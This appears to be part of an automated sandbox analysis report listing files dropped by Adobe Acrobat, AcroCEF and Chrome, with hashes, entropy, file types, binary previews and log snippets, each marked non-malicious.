                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):1.346577666106209
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:7+tmmASY9QmQ6Qeh7cLESiAi0mY9Q5qLBx/XYKQvGJF7ursL:7MLlYXtr1cI8KYEqll2GL7msL
                                                                                                        MD5:70D13CE5A7AA2D9462B4F382400FE26D
                                                                                                        SHA1:214F17761AFFAC3D7590790FC823D03F65BB0AE8
                                                                                                        SHA-256:C2493C0FFADBD874F9ABB11B8657FBD042FA2F48C8D02109518F50B1444DD13C
                                                                                                        SHA-512:D9C0677004DC18F5C4D014090B386AD1B3329EA6E3EEAC085A7A9D99018E6E140D1DAE649A16B4E9CA410921F15AA658D55BB4E1F94DF145ABB38305F03100E3
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j...#..#.#.#.#.#.#.#.#.7.7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):246
                                                                                                        Entropy (8bit):3.5085442896850614
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K82Rac:Qw946cPbiOxDlbYnuRK/t
                                                                                                        MD5:E9B0340F971D1F42D01D539BF1DB0002
                                                                                                        SHA1:1AA31C25BA85879EB29264EB4BD5CCB364306B98
                                                                                                        SHA-256:95D0DAD509355CC55C39D7314B1DF75DBEB3F05A1EC38A97C420469BE021F4EC
                                                                                                        SHA-512:EE58A932A1273634DA94F8B0A69986480F558AC5130EE2F1B6B101369D236BD0E3198FB278079F928A913F32962C20618C92EA90C418585F0A588AEC6B9942CF
                                                                                                        Malicious:false
                                                                                                        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.4./.1.0./.2.0.2.4. . .0.9.:.1.1.:.1.8. .=.=.=.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393)
                                                                                                        Category:dropped
                                                                                                        Size (bytes):16525
                                                                                                        Entropy (8bit):5.353642815103214
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:tbxtsuP+XEWJJQbnR8L31M7HeltV+KYm3wsa2KjF4ODkr/O8r2IUHUHMWwEyZRN2:aPL
                                                                                                        MD5:91F06491552FC977E9E8AF47786EE7C1
                                                                                                        SHA1:8FEB27904897FFCC2BE1A985D479D7F75F11CEFC
                                                                                                        SHA-256:06582F9F48220653B0CB355A53A9B145DA049C536D00095C57FCB3E941BA90BB
                                                                                                        SHA-512:A63E6E0D25B88EBB6602885AB8E91167D37267B24516A11F7492F48876D3DDCAE44FFC386E146F3CF6EB4FA6AF251602143F254687B17FCFE6F00783095C5082
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:072+0200 ThreadID=6404 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=ec4bacf2-5410-40d4-850b-5ac338f864f3.1696585143072 Timestamp=2023-10-06T11:39:03:073+0200 ThreadID=6404 Component=ngl-lib_NglAppLib Description="SetConfig:
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):15114
                                                                                                        Entropy (8bit):5.372422240474652
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:qQUhKWBGNV6EJLaYzGYwtqAigdNWRe4p17bIBVXbnyXjBqI5tStEtitpt4UtSt16:hCM8iwLB4f6
                                                                                                        MD5:2BCB94D1B84BA7AA9EAF64E0F0C0C295
                                                                                                        SHA1:F9919DD714B2C55EF6836C1F9D3ED1349A895F7C
                                                                                                        SHA-256:1D411102FD692B0BC22CCCCB310C9B9CCC7FFED09D78E19D99ECFA0441AE3FCE
                                                                                                        SHA-512:BA6CEF61EB95E9C1192201F25FC1737D53E3F1E74507035F8CC2FF690DE53F0D2E5AF03A791CAD84B7B44778C7E8C3F126AB435BC2F26526AD5468F5A7F78023
                                                                                                        Malicious:false
                                                                                                        Preview:SessionID=5f4ba263-d69d-46f7-9835-6be3db760dc4.1728047472943 Timestamp=2024-10-04T09:11:12:943-0400 ThreadID=1576 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=5f4ba263-d69d-46f7-9835-6be3db760dc4.1728047472943 Timestamp=2024-10-04T09:11:12:952-0400 ThreadID=1576 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=5f4ba263-d69d-46f7-9835-6be3db760dc4.1728047472943 Timestamp=2024-10-04T09:11:12:952-0400 ThreadID=1576 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=5f4ba263-d69d-46f7-9835-6be3db760dc4.1728047472943 Timestamp=2024-10-04T09:11:12:952-0400 ThreadID=1576 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=5f4ba263-d69d-46f7-9835-6be3db760dc4.1728047472943 Timestamp=2024-10-04T09:11:12:954-0400 ThreadID=1576 Component=ngl-lib_NglAppLib Description="SetConf
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                        Category:dropped
                                                                                                        Size (bytes):29752
                                                                                                        Entropy (8bit):5.415975933691287
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:768:bo++qj6Nc7vAHjEtejto1q9tlRQb0ejnBEMaGm1qvtvejlR/:m
                                                                                                        MD5:39C07A7D3BA383BDEBF6AD8FBE5BDEE5
                                                                                                        SHA1:6C54AEE1008322C070A83E57BF82B966BAD39303
                                                                                                        SHA-256:B4A042EC996A21C82339887C596D8D02F58FFE546C3B6A00E452D42A55055F7D
                                                                                                        SHA-512:F5DA67CF1C9745CF898BFC84994A376C1C19366E58E1EAA4FF9D6C462556CC448C85C2B9DF930AA6DAF4C96E42926EBA76D812678FE4A96DD1E8E7875FA806E8
                                                                                                        Malicious:false
                                                                                                        Preview:06-10-2023 10:08:42:.---2---..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ***************************************..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Starting NGL..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..06-10-2023 10:08:42:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..06-10-2023 10:08:42:.Closing File..06-10-
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                                                                        Category:dropped
                                                                                                        Size (bytes):386528
                                                                                                        Entropy (8bit):7.9736851559892425
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                                                                        Malicious:false
                                                                                                        Preview:...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-|..h#.g.\.PO.|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..|m.WC.....|.....e.[W.p.8...rm....^..x'......5!...|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                        Category:dropped
                                                                                                        Size (bytes):758601
                                                                                                        Entropy (8bit):7.98639316555857
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                        MD5:3A49135134665364308390AC398006F1
                                                                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                        Malicious:false
                                                                                                        Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1419751
                                                                                                        Entropy (8bit):7.976496077007677
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/xaWL07oywYIGNPolGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JaWLxywZG0GZN3mlind9i4ufFXpAXkru
                                                                                                        MD5:68E2A47A15C38FAEDFF86B540B88B7E1
                                                                                                        SHA1:AAA8D7C52B2059FF11C789C5B02EC98F3574E2B7
                                                                                                        SHA-256:FC2F2900E11700272728A5C21AA4C495D919D3A981B94F10971A7665799B85A8
                                                                                                        SHA-512:164FD425774D3A53E324173D7561FE9623EFD6B903F39C77745425B4E673B7F396FA70AB81C9631FB93C25E3550ED253A4D0ADFEC48C6C138A667F2E872F4C61
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1407294
                                                                                                        Entropy (8bit):7.97605879016224
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24576:/M7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07tOWLaGZ4ZwYIGNPS:RB3mlind9i4ufFXpAXkrfUs0kWLaGZ48
                                                                                                        MD5:1D64D25345DD73F100517644279994E6
                                                                                                        SHA1:DE807F82098D469302955DCBE1A963CD6E887737
                                                                                                        SHA-256:0A05C4CE0C4D8527D79A3C9CEE2A8B73475F53E18544622E4656C598BC814DFC
                                                                                                        SHA-512:C0A37437F84B4895A7566E278046CFD50558AD84120CA0BD2EAD2259CA7A30BD67F0BDC4C043D73257773C607259A64B6F6AE4987C8B43BB47241F3C78EB9416
                                                                                                        Malicious:false
                                                                                                        Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:11:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2673
                                                                                                        Entropy (8bit):3.970325394373748
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8XndusTjDiH5idAKZdA1FehwiZUklqehPy+3:81bccy
                                                                                                        MD5:845BA9FF13FFAA07E44D91A759ED35FD
                                                                                                        SHA1:981AFD2BFBB3648459A18FD507AC5D700C399FA3
                                                                                                        SHA-256:82701781F550679C15BF33DE79EDC297D7E5B51A5AF1354AC6EE189CB86BEB25
                                                                                                        SHA-512:3AD9EBDFD24B856BDA5436AFFEEB3E4492E20104638772EC8E52B23FD4C3BAE2A4164D87006B07C94389ED567A15365D265435F05A9077C87F36B9A1CF3A3C2C
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,....?..^...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDYii...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:11:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2675
                                                                                                        Entropy (8bit):3.985078572979297
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8EdusTjDiH5idAKZdA1seh/iZUkAQkqehMy+2:80bS9QNy
                                                                                                        MD5:9EA0FDA190DFD3236085B8C1EC71D6B6
                                                                                                        SHA1:4B14ED572031943D89AA4231C0EA6018F88E25C2
                                                                                                        SHA-256:0226AA5EDA9A88EE99ADEC7CA3A8CC352CA3ADD001DC634179B2B38AD8F4F2CF
                                                                                                        SHA-512:E216BFE90F9D169C7DBD97CCBE133267CC5BD8E647B84C0D4321F620804412102601C7ED453FC761C58711BD43C0A94B39927C1132F85C612175C76AFB8D793C
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,....Y...^...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDYii...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2689
                                                                                                        Entropy (8bit):3.995205489050952
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:81dusTjDAH5idAKZdA14meh7sFiZUkmgqeh7sqy+BX:8jb4nYy
                                                                                                        MD5:124B024D4B0C58F5C75A1CFFB0FC4A96
                                                                                                        SHA1:0DF4D20D2BB423B7A63C9A8BDC99CE6FFAC2E933
                                                                                                        SHA-256:6D0685E0F6C3935C59C15C8D8986E0AADB7DE680536F74C6FECB68000D632438
                                                                                                        SHA-512:1CAF302A4CDF62AA9E1AA3151410B30578C0D97E47D06D753C35DBB60C04F4F8C506113F155946F8902A3F11CA9AD9C5B52E284E218E73F940434358AE9FF5DB
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:11:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2677
                                                                                                        Entropy (8bit):3.9850556242920163
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8WZdusTjDiH5idAKZdA1TehDiZUkwqehgy+R:8obJyy
                                                                                                        MD5:2CE88303C241BF2FFD6BF92DBE6D786F
                                                                                                        SHA1:812E0AD88CA102C976F56DF5D4719EDD5F4A79E3
                                                                                                        SHA-256:401FCCD19AA3C6BCC9CD557255DDAF60FA340E66433F4EB867A4797F9A874AFA
                                                                                                        SHA-512:DFF8FECDB66F2CA456A7B944C2F90B1C1B62ED5FFC8641EAF459263A6838CA38BCE1CEE9A729815D1FE7DEB56F84EAB271ED4901DB7C794BF2A606D04A0AB100
                                                                                                        Malicious:false
                                                                                                        Preview:L..................F.@.. ...$+.,.......^...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.IDYYi....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VDYhi....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VDYhi....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VDYhi..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDYii...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........s4b}.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 12:11:17 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2677
                                                                                                        Entropy (8bit):3.9712078015018797
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:8pdusTjDiH5idAKZdA1dehBiZUk1W1qehmy+C:8vbZ9Gy
                                                                                                        MD5:5B7F641727FE91C0A3AD30F907834BC1
                                                                                                        SHA1:37AE350E68AB48CDAB1A631B0F9BCCA06067B0A9
                                                                                                        SHA-256:C77D2C926178EB15EA151283E43CA4BE343A4E8D3010EA95AFBFA99E92BCC461
                                                                                                        SHA-512:C265492DEDFC09C6E40312260EAABCE8F5D4DC9EF48423EFD2B7401C4B81E7D69D3D386B5F284524805A1C2C785FBC8567285F933164428AD57C0FE5B4880B7D
                                                                                                        Malicious:false
